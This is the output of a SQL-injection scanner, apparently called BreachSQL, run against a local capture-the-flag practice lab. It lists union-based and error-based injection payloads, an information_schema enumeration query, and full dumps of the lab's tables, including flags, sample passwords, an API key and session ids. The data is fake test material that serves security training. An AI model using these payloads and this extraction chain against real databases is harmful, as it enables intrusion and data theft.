BreachSQL Scan Report

1. http://127.0.0.1:17476/challenges/my1/users?id=1

Duration

1.07s

Requests

Crawled URLs

Params tested

WAF

None

Evasion

None

Findings

Findings4 CRITICAL2 HIGH

#	Type	Severity	Location	Details
1	extraction	CRITICAL	http://127.0.0.1:17476/challenges/my1/users?id=1	parameter: id method: GET expr: VERSION() value: 8.0.46 mode: union
2	extraction	CRITICAL	http://127.0.0.1:17476/challenges/my1/users?id=1	parameter: id method: GET expr: CURRENT_USER() value: firerange@% mode: union
3	extraction	CRITICAL	http://127.0.0.1:17476/challenges/my1/users?id=1	parameter: id method: GET expr: DATABASE() value: firerange mode: union
4	extraction	CRITICAL	http://127.0.0.1:17476/challenges/my1/users?id=1	parameter: id method: GET expr: (SELECT GROUP_CONCAT(table_name ORDER BY table_name SEPARATOR ',') FROM information_schema.tables WHERE table_schema=... value: challenges,my1_notes,my1_secrets,my1_users,my2_group_targets,my2_inbox,my2_members,my3_accounts,my3_catalog,my3_items... mode: union
5	error_based_sqli	HIGH	http://127.0.0.1:17476/challenges/my1/users?id=1	parameter: id method: GET payload: ' dbms: mysql evidence: [{"db_error":"1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL ser...
6	union_based_sqli	HIGH	http://127.0.0.1:17476/challenges/my1/users?id=1	parameter: id method: GET payload: UNION SELECT 'BreachSQL_tiludd',NULL-- - column_count: 2 extracted: "},{"id":"BreachSQL_tiludd","username":null}]

challenges

0 rows · 8 columns · http://127.0.0.1:17476/challenges/my1/users?id=1 · param: id · method: GET

challenge_id	tier	title	description	technique	endpoint	points	flag

my1_notes

3 rows · 3 columns · http://127.0.0.1:17476/challenges/my1/users?id=1 · param: id · method: GET

id	author	content
1	admin	FIRE{my1c_double_quote_error}
2	alice	meeting at 3pm
3	bob	remember to patch the server

my1_secrets

2 rows · 3 columns · http://127.0.0.1:17476/challenges/my1/users?id=1 · param: id · method: GET

id	name	value
1	flag	FIRE{my1b_union_secrets_extracted}
2	api_key	sk-firerange-0xdeadbeef

my1_users

4 rows · 4 columns · http://127.0.0.1:17476/challenges/my1/users?id=1 · param: id · method: GET

id	username	email	role
1	admin	admin@firerange.local	admin
2	alice	alice@firerange.local	user
3	bob	bob@firerange.local	user
4	charlie	charlie@firerange.local	user

my2_group_targets

3 rows · 4 columns · http://127.0.0.1:17476/challenges/my1/users?id=1 · param: id · method: GET

id	dept	score	flag
1	engineering	42	FIRE{my2e_having_group_by}
2	marketing	17	not_the_flag
3	sales	99	not_the_flag

my2_inbox

3 rows · 3 columns · http://127.0.0.1:17476/challenges/my1/users?id=1 · param: id · method: GET

id	owner	message
1	admin	FIRE{my2d_second_step_extracted}
2	alice	Hello Alice
3	bob	Hello Bob

my2_members

4 rows · 4 columns · http://127.0.0.1:17476/challenges/my1/users?id=1 · param: id · method: GET

id	username	password	secret
1	admin	hunter2	FIRE{my2a_boolean_blind_enumerated}
2	alice	p@ssw0rd	alice_private_note
3	bob	qwerty123	bob_private_note
4	mallory	evil1337	FIRE{my2c_or_based_bypass}

my3_accounts

2 rows · 4 columns · http://127.0.0.1:17476/challenges/my1/users?id=1 · param: id · method: GET

id	username	dept	flag
1	jsmith	engineering	FIRE{my3e_paren_context_blind}
2	jdoe	marketing	not_the_flag

my3_catalog

3 rows · 6 columns · http://127.0.0.1:17476/challenges/my1/users?id=1 · param: id · method: GET

id	title	brand	sku	price	flag
1	Laptop Pro	TechCo	LP-001	999.99	FIRE{my3d_five_col_union}
2	Mouse	TechCo	MS-001	29.99	not_the_flag
3	Keyboard	TypeFast	KB-001	79.99	not_the_flag

my3_items

3 rows · 4 columns · http://127.0.0.1:17476/challenges/my1/users?id=1 · param: id · method: GET

id	name	description	price
1	Widget A	Standard widget	9.99
2	Widget B	Premium widget	19.99
3	Flag Item	FIRE{my3b_path_param_pwned}	0.01

my3_products

3 rows · 4 columns · http://127.0.0.1:17476/challenges/my1/users?id=1 · param: id · method: GET

id	name	category	flag
1	Product X	electronics	FIRE{my3c_multicolumn_union}
2	Product Y	clothing	red_herring_1
3	Product Z	food	red_herring_2

my3_schema_flag

1 row · 3 columns · http://127.0.0.1:17476/challenges/my1/users?id=1 · param: id · method: GET

id	note	flag
1	hidden	FIRE{my3f_schema_walker}

my4_agent_log

2 rows · 3 columns · http://127.0.0.1:17476/challenges/my1/users?id=1 · param: id · method: GET

id	agent	flag
1	Mozilla/5.0	FIRE{my4f_header_injection}
2	curl/7.0	not_the_flag

my4_api_users

2 rows · 3 columns · http://127.0.0.1:17476/challenges/my1/users?id=1 · param: id · method: GET

user_id	username	token
1	system	FIRE{my4b_json_body_injection}
2	service	not_a_flag_yet

my4_entries

3 rows · 3 columns · http://127.0.0.1:17476/challenges/my1/users?id=1 · param: id · method: GET

id	label	payload
1	normal	benign data
2	flag	FIRE{my4a_waf_bypass_comment}
3	decoy	nothing_here

my4_hex_store

2 rows · 3 columns · http://127.0.0.1:17476/challenges/my1/users?id=1 · param: id · method: GET

id	label	flag
1	public	not_the_flag
2	secret	FIRE{my4h_hex_char_bypass}

my4_numeric_store

2 rows · 3 columns · http://127.0.0.1:17476/challenges/my1/users?id=1 · param: id · method: GET

id	value	flag
1	42	FIRE{my4d_numeric_time_blind}
2	1337	not_the_flag

my4_sessions

2 rows · 3 columns · http://127.0.0.1:17476/challenges/my1/users?id=1 · param: id · method: GET

session_id	username	flag
sess_abc123	admin	FIRE{my4e_cookie_injection}
sess_def456	alice	not_the_flag

my5_hidden

2 rows · 3 columns · http://127.0.0.1:17476/challenges/my1/users?id=1 · param: id · method: GET

id	key	flag
1	secret	FIRE{my5b_crawl_and_conquer}
2	decoy	not_a_flag

my5_kwvault

1 row · 3 columns · http://127.0.0.1:17476/challenges/my1/users?id=1 · param: id · method: GET

id	level	flag
1	legend	FIRE{my5c_keyword_doubling}

my5_oob_notes

1 row · 3 columns · http://127.0.0.1:17476/challenges/my1/users?id=1 · param: id · method: GET

id	note	flag
1	MySQL supports LOAD_FILE() and SELECT INTO OUTFILE for file-based OOB exfiltration.	FIRE{my5d_oob_technique_recognised}

my5_reports

3 rows · 5 columns · http://127.0.0.1:17476/challenges/my1/users?id=1 · param: id · method: GET

id	title	body	author	status
1	Q1 Review	Financial summary for Q1.	admin	published
2	Incident Log	Security incident details here.	secteam	classified
3	Dev Notes	Internal architecture notes.	devops	draft

my5_vault

1 row · 3 columns · http://127.0.0.1:17476/challenges/my1/users?id=1 · param: id · method: GET

id	level	flag
1	legend	FIRE{my5a_legend_full_chain_owned}